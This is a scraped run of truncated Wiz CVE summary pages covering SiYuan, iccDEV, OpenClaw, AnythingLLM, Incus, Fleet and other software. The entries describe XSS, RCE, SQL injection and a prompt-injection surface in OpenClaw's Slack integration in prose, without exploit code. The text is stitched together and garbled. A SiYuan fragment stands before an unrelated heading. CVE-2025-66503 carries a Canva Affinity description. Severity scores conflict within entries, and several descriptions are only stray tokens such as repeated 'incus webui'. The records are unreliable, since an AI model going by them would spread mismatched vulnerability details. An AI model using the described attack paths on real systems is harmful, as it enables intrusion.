SiYuan is a personal knowledge management system. In versions 3.6.0 and below, SanitizeSVG has an incomplete blocklist — it blocks data:text/html and data:image/svg+xml in href attributes but misses data:text/xml and data:application/xml, both of which can render SVG with JavaScript execution. The unauthenticated /api/icon/getDynamicIcon endpoint serves user-controlled input (via the content parameter) directly into SVG markup using fmt.Sprintf with no escaping, served as Content-Type: image/svg+xml. This creates a click-through XSS: a victim navigates to a crafted URL, sees an SVG with an injected link, and clicking it triggers JavaScript via the bypassed MIME types. The attack requires direct navigation to the endpoint
Wiz
CVE-2025-66503 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-66503 [MEDIUM] CVE-2025-66503 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66503 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-23954 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-23954 [HIGH] CVE-2026-23954 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23954 :
Homebrew vulnerability analysis and mitigation
Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication.
Source : NVD
## 8.7
Wiz
CVE-2026-21687 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21687 [HIGH] CVE-2026-21687 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21687 :
Homebrew vulnerability analysis and mitigation
CIccTagCurve::CIccTagCurve()
Source : NVD
## 7.1
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2
Wiz
CVE-2025-68669 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2025-68669 [CRITICAL] CVE-2025-68669 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68669 :
Homebrew vulnerability analysis and mitigation
5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. In versions 0.15.2 and prior, an RCE vulnerability exists in useMarkdown.ts, where the markdown-it-mermaid plugin is initialized with securityLevel: 'loose'. This configuration explicitly permits the rendering of HTML tags within Mermaid diagram nodes. This issue has not been patched at time of publication.
Source : NVD
## 9.6
Score
Published December 23, 2025
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.9
Exploitation Probability (EPSS) 0.1
Affecte
Wiz
CVE-2026-24404 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24404 [HIGH] CVE-2026-24404 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24404 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-27465 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.3
CVE-2026-27465 [LOW] CVE-2026-27465 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27465 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. In versions prior to 4.80.1, a vulnerability in Fleet’s configuration API could expose Google Calendar service account credentials to authenticated users with low-privilege roles. This may allow unauthorized access to Google Calendar resources associated with the service account. Fleet returns configuration data through an API endpoint that is accessible to authenticated users, including those with the lowest-privilege “Observer” role. In affected versions, Google Calendar service account credentials were not properly obfuscated before being returned. As a result, a low-privilege user could retrieve the service account’s private key material. Depending on how the Google Cal
Wiz
CVE-2026-21484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21484 [MEDIUM] CVE-2026-21484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21484 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.
Source : NVD
## 5.3
Score
Published January 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.5
Exploitation Probability (EPSS) 0.1
Affected packages and l
Wiz
CVE-2026-32628 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-32628 [HIGH] CVE-2026-32628 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32628 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, a SQL injection vulnerability in the built-in SQL Agent plugin allows any user who can invoke the agent to execute arbitrary SQL commands on connected databases. The getTableSchemaSql() method in all three database connectors (MySQL, PostgreSQL, MSSQL) constructs SQL queries using direct string concatenation of the table_name parameter without sanitization or parameterization.
Source : NVD
## 7.7
Score
Published March 16, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date
Wiz
CVE-2026-25582 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25582 [HIGH] CVE-2026-25582 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25582 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.3, there is a heap buffer overflow (read) vulnerability in CIccIO::WriteUInt16Float() when converting malformed XML to ICC profiles via iccFromXml tool. This issue has been patched in version 2.3.1.3.
Source : NVD
## 7.8
Score
Published February 4, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Home
Wiz
CVE-2026-25593 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-25593 [HIGH] CVE-2026-25593 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25593 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated local client could use the Gateway WebSocket API to write config via config.apply and set unsafe cliPath values that were later used for command discovery, enabling command injection as the gateway user. This vulnerability is fixed in 2026.1.20.
Source : NVD
## 8.4
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Sev
Wiz
CVE-2023-29144 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.3
CVE-2023-29144 [LOW] CVE-2023-29144 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-29144 :
Homebrew vulnerability analysis and mitigation
Malwarebytes 1.0.14 for Linux doesn't properly compute signatures in some scenarios. This allows a bypass of detection.
Source : NVD
## 3.3
Score
Published December 12, 2025
Severity LOW
CNA Score 3.3
Affected Technologies
Homebrew
Malwarebytes
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
malwarebytes
cpe:2.3:a:malwarebytes:malwarebytes
Sources
Homebrew Severity LOW No Fix Added at: Dec 22, 2025
Windows Severity LOW No Fix Added at: Dec 22, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus
Wiz
CVE-2026-30980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-30980 [MEDIUM] CVE-2026-30980 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30980 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack overflow in CIccBasicStructFactory::CreateStruct() causing uncontrolled recursion/stack exhaustion and crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get
Wiz
CVE-2026-30978 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-30978 [HIGH] CVE-2026-30978 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30978 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-use-after-free in CIccCmm::AddXform() causing invalid vptr dereference and crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in yo
Wiz
CVE-2026-34449 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-34449 [CRITICAL] CVE-2026-34449 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34449 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, a malicious website can achieve Remote Code Execution (RCE) on any desktop running SiYuan by exploiting the permissive CORS policy (Access-Control-Allow-Origin: * + Access-Control-Allow-Private-Network: true) to inject a JavaScript snippet via the API. The injected snippet executes in Electron's Node.js context with full OS access the next time the user opens SiYuan's UI. No user interaction is required beyond visiting the malicious website while SiYuan is running. This issue has been patched in version 3.6.2.
Source : NVD
## 9.6
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Homebrew
Has Public Explo
Wiz
CVE-2026-33745 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-33745 [HIGH] CVE-2026-33745 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33745 :
Homebrew vulnerability analysis and mitigation
Authorization
Source : NVD
## 7.4
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpp-httplib
Sources
NVD
Debian 12, 13, 14 Severity HIGH No Fix Added at: Mar 29, 2026
Echo Severity HIGH No Fix Added at: Mar 29, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerab
Wiz
CVE-2026-25253 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-25253 [HIGH] CVE-2026-25253 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25253 :
Homebrew vulnerability analysis and mitigation
OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value.
Source : NVD
## 8.8
Score
Published February 1, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
openclaw
clawdbot
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 03, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 15, 2026
## Get a CVE risk ass
Wiz
CVE-2026-33066 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33066 [MEDIUM] CVE-2026-33066 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33066 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the backend renderREADME function uses lute.New() without calling SetSanitize(true), allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to innerHTML without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution. The issue was patched in version 3.6.1.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDI
Wiz
CVE-2026-24764 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-24764 [LOW] CVE-2026-24764 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24764 :
Homebrew vulnerability analysis and mitigation
OpenClaw (formerly Clawdbot) is a personal AI assistant users run on their own devices. In versions 2026.2.2 and below, when the Slack integration is enabled, channel metadata (topic/description) can be incorporated into the model's system prompt. Prompt injection is a documented risk for LLM-driven systems. This issue increases the injection surface by allowing untrusted Slack channel metadata to be treated as higher-trust system input. This issue has been fixed in version 2026.2.3.
Source : NVD
## 3.7
Score
Published February 19, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CI
Wiz
CVE-2026-23517 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-23517 [MEDIUM] CVE-2026-23517 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23517 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. A broken access control issue in versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 allowed authenticated users to access debug and profiling endpoints regardless of role. As a result, low-privilege users could view internal server diagnostics and trigger resource-intensive profiling operations. Fleet’s debug/pprof endpoints are accessible to any authenticated user regardless of role, including the lowest-privilege “Observer” role. This allows low-privilege users to access sensitive server internals, including runtime profiling data and in-memory application state, and to trigger CPU-intensive profiling operations that could lead to denial of service. Versions 4.7
Wiz
CVE-2025-60935 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-60935 [MEDIUM] CVE-2025-60935 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-60935 :
Homebrew vulnerability analysis and mitigation
An open redirect vulnerability in the login endpoint of Blitz Panel v1.17.0 allows attackers to redirect users to malicious domains via a crafted URL. This issue affects the next_url parameter in the login endpoint and could lead to phishing or token theft after successful authentication.
Source : NVD
## 6.1
Score
Published December 24, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
blitz
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Jan 19, 2026
## Get a CVE risk as
Wiz
CVE-2026-29049 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-29049 [MEDIUM] CVE-2026-29049 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29049 :
Homebrew vulnerability analysis and mitigation
melange allows users to build apk packages using declarative pipelines. In version 0.40.5 and prior, melange update-cache downloads URIs from build configs via io.Copy without any size limit or HTTP client timeout (pkg/renovate/cache/cache.go). An attacker-controlled URI in a melange config can cause unbounded disk writes, exhausting disk on the build runne. There is no known patch publicly available.
Source : NVD
## 4.3
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
Affected packages an
Wiz
CVE-2026-22047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-22047 [HIGH] CVE-2026-22047 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22047 :
Homebrew vulnerability analysis and mitigation
SIccCalcOp::Describe()
IccProfLib/IccMpeCalc.cpp
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-31807 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-31807 [CRITICAL] CVE-2026-31807 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31807 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.5.10, SiYuan's SVG sanitizer (SanitizeSVG) blocks dangerous elements ( , , ) and removes on* event handlers and javascript: in href attributes. However, it does NOT block SVG animation elements ( , ) which can dynamically set attributes to dangerous values at runtime, bypassing the static sanitization. This allows an attacker to inject executable JavaScript into the unauthenticated /api/icon/getDynamicIcon endpoint (type=8), creating a reflected XSS. This is a bypass of the fix for CVE-2026-29183 (fixed in v3.5.9). This vulnerability is fixed in v3.5.10.
Source : NVD
## 6.4
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.4
Affected Technologi
Wiz
CVE-2026-21680 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-21680 [MEDIUM] CVE-2026-21680 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21680 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer dereference vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.
Source : NVD
## 7.5
Score
Published January 7, 2026
Severity HIGH
CNA Score 6.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.3
Exploitation Probability (EPSS) 0.1
Affected packages an
Wiz
CVE-2026-21679 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21679 [HIGH] CVE-2026-21679 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21679 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap-buffer-overflow in CIccLocalizedUnicode::GetText(). This issue has been patched in version 2.3.1.2.
Source : NVD
## 9.8
Score
Published January 7, 2026
Severity CRITICAL
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at: Jan 12, 2026
## Get a
Wiz
CVE-2026-24477 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24477 [HIGH] CVE-2026-24477 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24477 :
Homebrew vulnerability analysis and mitigation
/api/setup-complete
Source : NVD
## 8.7
Score
Published January 27, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 93.5
Exploitation Probability (EPSS) 11.2
Affected packages and libraries
cpe:2.3:a:mintplexlabs:anythingllm
anythingllm
Sources
Homebrew Severity HIGH Has Fix Added at: Jan 29, 2026
Linux Severity HIGH Has Fix Added at: Feb 24, 2026
Windows Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's list
Wiz
CVE-2026-31866 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-31866 [HIGH] CVE-2026-31866 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31866 :
Homebrew vulnerability analysis and mitigation
flagd is a feature flag daemon with a Unix philosophy. Prior to 0.14.2, flagd exposes OFREP (/ofrep/v1/evaluate/...) and gRPC (evaluation.v1, evaluation.v2) endpoints for feature flag evaluation. These endpoints are designed to be publicly accessible by client applications. The evaluation context included in request payloads is read into memory without any size restriction. An attacker can send a single HTTP request with an arbitrarily large body, causing flagd to allocate a corresponding amount of memory. This leads to immediate memory exhaustion and process termination (e.g., OOMKill in Kubernetes environments). flagd does not natively enforce authentication on its evaluation endpoints. While operators may deploy flagd
Wiz
CVE-2026-29073 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-29073 [MEDIUM] CVE-2026-29073 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29073 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.0, the /api/query/sql lets a user run sql directly, but it only checks basic auth, not admin rights, any logged-in user, even readers, can run any sql query on the database. This issue has been patched in version 3.6.0.
Source : NVD
## 5.7
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 5.7
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/siyuan-note/siyuan/kernel
siyuan
Sources
NVD
GoLang Severity MEDIUM No Fix Added at:
Wiz
CVE-2026-21497 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21497 [MEDIUM] CVE-2026-21497 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21497 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk a
Wiz
CVE-2026-27002 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-27002 [HIGH] CVE-2026-27002 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27002 :
Homebrew vulnerability analysis and mitigation
docker create
network=host
seccompProfile=unconfined
apparmorProfile=unconfined
agents.*.sandbox.docker.binds
agents.*.sandbox.docker.network
none
bridge
unconfined
Source : NVD
## 7.7
Score
Published February 20, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 19, 2026
Homebrew Severity CRITICAL Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a priori
Wiz
CVE-2026-33898 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33898 [HIGH] CVE-2026-33898 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33898 :
Homebrew vulnerability analysis and mitigation
incus webui
incus webui
incus webui
Source : NVD
## 8.8
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
incus
github.com/lxc/incus/v6/cmd/incus
Sources
NVD
Debian 13, 14 Severity LOW No Fix Added at: Mar 29, 2026
Echo Severity HIGH No Fix Added at: Mar 29, 2026
GoLang Severity HIGH Has Fix Added at: Mar 29, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in you
Wiz
CVE-2026-31797 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-31797 [MEDIUM] CVE-2026-31797 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31797 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CTiffImg::ReadLine() when iccApplyProfiles processes a crafted TIFF image, causing memory disclosure or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 6.1
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE
Wiz
CVE-2026-21503 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21503 [MEDIUM] CVE-2026-21503 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21503 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to a null pointer passed to memcpy() in CIccTagSparseMatrixArray. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 6.1
